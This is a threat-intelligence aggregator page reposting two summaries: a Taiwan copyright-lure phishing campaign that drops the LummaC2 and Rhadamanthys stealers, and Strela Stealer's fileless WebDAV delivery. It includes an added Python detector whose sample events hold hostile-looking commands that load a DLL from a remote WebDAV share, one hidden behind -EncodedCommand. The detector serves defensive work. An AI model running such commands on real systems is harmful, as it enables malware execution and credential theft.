Home - The article:
Source |
RiskIQ |
Identifier |
8604731 |
Publication date |
2024-11-01 16:56:15 (viewed: 2024-11-01 17:07:24) |
Title |
Threat actors use copyright infringement phishing lure to deploy infostealers (Recycled) |
Text |
#### Targeted Geolocations
- Taiwan
## Snapshot
Cisco Talos recently identified a phishing campaign targeting Facebook business and advertising accounts in Taiwan.
## Description
This campaign involves emails masquerading as legal notices from well-known companies, claiming copyright infringement and demanding action within 24 hours. The emails lure recipients into downloading malware disguised as PDF files. The threat actor uses multiple techniques to evade detection, including abusing Google's AppSpot.com domains and Dropbox for malware distribution.
The phishing emails are written in Traditional Chinese, with filenames crafted to look like legal documents from recognizable companies, suggesting the attacker thoroughly researched its targets. When victims download the attached RAR file, a password-protected archive contains an information stealer, typically LummaC2 or Rhadamanthys, which collects sensitive data, including system credentials, and transmits it to the attacker's command-and-control (C2) servers.
Talos observed that LummaC2 operates by encrypting its shellcode, hiding the payload in system memory, and using the CreateFileMappingA API to evade detection. Rhadamanthys similarly relies on obfuscation and process injection, inflating file sizes to bypass antivirus scans and embedding itself in legitimate system processes. Both malware loaders manipulate registry entries for persistence and use mutex objects to prevent duplicate infections. This campaign demonstrates the evolving sophistication of phishing attacks targeting business accounts and the methods used to bypass traditional security measures.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments on inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in |
Notes |
★★
|
Sent |
Yes |
Tags |
Ransomware
Spam
Malware
Tool
Threat
|
Republications of the article (1):
Source |
RiskIQ |
Identifier |
8603945 |
Publication date |
2024-10-30 22:28:21 (viewed: 2024-10-30 23:07:27) |
Title |
Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV (Recycled) |
Text |
#### Targeted Geolocations
- Spain
- Germany
## Snapshot
The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe.
## Description
These phishing emails contain ZIP files with obfuscated JavaScript files that, when opened, trigger a PowerShell command to download a malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. This method allows Strela Stealer to bypass detection by not saving files to disk. The malware's payload is embedded within a DLL file designed to extract email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, which are then transmitted to the attackers' command server.
Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking locale settings on the infected system. Additionally, it collects system details and file directory data, which allows attackers to perform reconnaissance and possibly conduct follow-up attacks. The malware uses sophisticated evasion techniques, such as JavaScript obfuscation and base64 encoding, making it challenging for security tools to detect. Strela Stealer's evolution, from simple phishing with ISO attachments to complex fileless execution, highlights the ongoing advancements in malware distribution tactics, emphasizing the need for robust cybersecurity measures to address such sophisticated threats.
## Microsoft Analysis and Additional OSINT Context
Threat actors use WebDAV for distributing information-stealing malware, such as Strela Stealer, because it offers several advantages for evasion, simplicity, and control over payload delivery:
- Fileless Execution and Evasion: WebDAV enables fileless malware execution by running malicious payloads directly from remote servers without saving them locally on the target machine. This helps bypass many traditional security defenses that focus on scanning files on disk, as no local file is created.
- Direct Remote Access: WebDAV is designed to allow clients to interact with remote servers as though they were local folders. This allows threat actors to distribute payloads seamlessly over HTTP/HTTPS, appearing as legitimate remote connections to the system, which reduces the chances of detection.
- Efficient Data Transmission: WebDAV supports real-time access to resources over the network, making it efficient for both distribution and control. Attackers can change payloads or update malicious DLLs on their WebDAV server, ensuring that new or adapted versions of malware are available without having to reinfect machines.
- Bypassing Firewalls and Security Filters: Many organizations allow outbound WebDAV traffic through HTTP or HTTPS. This allows attackers to communicate with compromised devices without raising alarms, as this traffic blends in with normal web traffic.
- Modular and Scalable Attacks: By using WebDAV, threat actors can scale their operations, as they only need to update files on a centralized server to infect multiple systems, enhancing the malware's reach with minimal adjustments on the attacker's side.
These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible, and scalable methods to deliver information-stealing malware.
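The execution chain described above (an obfuscated JavaScript attachment launching PowerShell, which pulls a DLL straight off a WebDAV share) leaves a recognisable trace in endpoint process-creation telemetry even though nothing is written to disk: a script host as parent, a living-off-the-land binary as child, and a WebDAV-style path (`\\host@SSL\DavWWWRoot\...`) in the command line, sometimes hidden behind `-EncodedCommand`. The following detection sketch is an added example, not code from the Cyble or Microsoft write-ups; the event format, the `ProcessEvent` fields, the WebDAV path patterns and every sample event are constructed assumptions for illustration (the IP address is from the RFC 5737 documentation range).

```python
"""Detection sketch for the script-host -> PowerShell -> WebDAV chain.

Added example, not from the original write-up. Event shape, path patterns
and sample events are constructed assumptions.
"""
import base64
import re
from dataclasses import dataclass

# Assumption: how a WebDAV destination tends to show up in a Windows command
# line. The WebClient redirector syntax (host@SSL, host@port, DavWWWRoot) is
# WebDAV-only; a bare https URL ending in .dll is the direct-download case.
WEBDAV_PATTERNS = [
    re.compile(r"\\\\[^\\\s]+@SSL", re.IGNORECASE),    # \\host@SSL\share
    re.compile(r"\\\\[^\\\s]+@\d+", re.IGNORECASE),     # \\host@8080\share
    re.compile(r"DavWWWRoot", re.IGNORECASE),           # \\host\DavWWWRoot\...
    re.compile(r"https?://\S+\.dll\b", re.IGNORECASE),  # DLL fetched by URL
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed shape, e.g. from Sysmon ID 1)."""
    parent: str
    image: str
    command_line: str


def encode_for_powershell(text: str) -> str:
    """Encode text the way PowerShell expects for -EncodedCommand (UTF-16LE base64)."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so patterns see it."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return command_line
    return command_line + " " + decoded


def webdav_indicators(command_line: str) -> list:
    """Return the patterns that fire on the (decoded) command line."""
    text = decode_encoded_command(command_line)
    return [p.pattern for p in WEBDAV_PATTERNS if p.search(text)]


def classify(event: ProcessEvent) -> str:
    """Verdict: 'alert' for the full chain, 'review' for WebDAV use by a
    LOLBin without the script-host parent, 'ok' otherwise."""
    parent = event.parent.lower()
    image = event.image.lower()
    hits = webdav_indicators(event.command_line)
    if image in LOLBIN_CHILDREN and parent in SCRIPT_HOSTS and hits:
        return "alert"
    if image in LOLBIN_CHILDREN and hits:
        return "review"
    return "ok"


def scan(events):
    """Return (verdict, command_line) for every event that is not 'ok'."""
    return [(classify(e), e.command_line) for e in events if classify(e) != "ok"]


# Constructed sample telemetry: one plain chain, one hidden behind -enc,
# one benign PowerShell launch, one WebDAV DLL load without a script-host parent.
SAMPLE_EVENTS = [
    ProcessEvent("wscript.exe", "powershell.exe",
                 "powershell -w hidden rundll32 \\\\203.0.113.10@SSL\\DavWWWRoot\\invoice.dll,entry"),
    ProcessEvent("wscript.exe", "powershell.exe",
                 "powershell -nop -enc " + encode_for_powershell(
                     "rundll32 \\\\example.invalid\\DavWWWRoot\\x.dll,Entry")),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell Get-Process"),
    ProcessEvent("cmd.exe", "rundll32.exe",
                 "rundll32 \\\\fileserver@SSL\\DavWWWRoot\\lib.dll,Run"),
]

if __name__ == "__main__":
    for verdict, cmd in scan(SAMPLE_EVENTS):
        print(f"{verdict:6} {cmd[:80]}")
```

The parent/child pairing is what keeps the rule from firing on administrators who legitimately mount WebDAV shares; a `rundll32` loading a DLL from `DavWWWRoot` with no script-host parent is surfaced for review rather than alerted on, and a decoded `-EncodedCommand` is scanned in place so base64 wrapping does not hide the path.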
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t |
Notes |
★★
|
Sent |
Yes |
Tags |
Ransomware
Spam
Malware
Tool
Threat
|
The article does not appear to be a republication of an earlier one.